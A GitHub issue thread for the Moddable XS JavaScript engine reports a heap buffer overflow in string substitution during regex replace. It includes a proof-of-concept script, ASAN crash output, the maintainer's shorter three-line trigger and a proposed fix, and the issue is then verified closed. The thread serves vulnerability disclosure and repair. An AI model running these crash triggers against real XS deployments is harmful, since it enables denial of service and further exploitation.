Moddable-OpenSource/moddable #759: Heap-buf-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy

hope-fly, 2021-12-28:
##### Moddable-XS revision

Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f)

Version: 11.5.0 32 4

##### Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

##### Build steps

```bash
cd  ~/moddable/xs/makefiles/lin
make -f xst.mk
```

##### Test case

```javascript
function JSEtest(str, count) {
  while (str.length < ("$1", 1 << 16)) {
      try {
         str += str;
      } catch (e) {}
  }
  return str.substring();
}
var x = JSEtest("1", 1 << 20);
var y = JSEtest("$1", 1 << 16);

var exception;
try {
  var __v_6623 = x.replace(/(.+)/g, y);
} catch (e) {
  exception = e;
}
```
	

##### Execution  & Output with ASAN

```bash
$ ./moddable/build/bin/lin/debug/xst poc.js
==113836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdb09ffc820 at pc 0x0000004ec9ac bp 0x7ffe814586d0 sp 0x7ffe81457e80
WRITE of size 65536 at 0x7fdb09ffc820 thread T0
    #0 0x4ec9ab in __asan_memcpy (/usr/local/bin/xst+0x4ec9ab)
    #1 0x915e02 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1995:9
    #2 0x839a57 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834:5
    #3 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #4 0x90d877 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675:5
    #5 0x8fc277 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120:6
    #6 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #7 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #8 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #9 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #10 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

0x7fdb09ffc820 is located 0 bytes to the right of 16777248-byte region [0x7fdb08ffc800,0x7fdb09ffc820)
allocated by thread T0 here:
    #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80)
    #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9
    #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11
    #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2
    #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4
    #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19
    #6 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0ffbe13f78b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ffbe13f7900: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==113836==ABORTING
```

#### No-ASAN Output

```bash
[1]    5720 segmentation fault  xst poc.js
```

phoddie, 2021-12-28:
The POC may be simplified to the following:

```
var x = "1".repeat(65536);
var y = "$1".repeat(32768);
x.replace(/(.+)/g, y);
```

A quick fix is change this line...

https://github.com/Moddable-OpenSource/moddable/blob/2f93df297782cf0a31c1797b246becbf5e546f4f/xs/sources/xsString.c#L1883

...to use  `fxAddChunkSizes`:

```c
l = fxAddChunkSizes(the, l, mxStringLength(capture->value.string));
```

But it appears there are other paths where`l` can overflow, so this requires further investigation.

hope-fly, 2022-01-13:
Verified!

closed 2022-01-13 by phoddie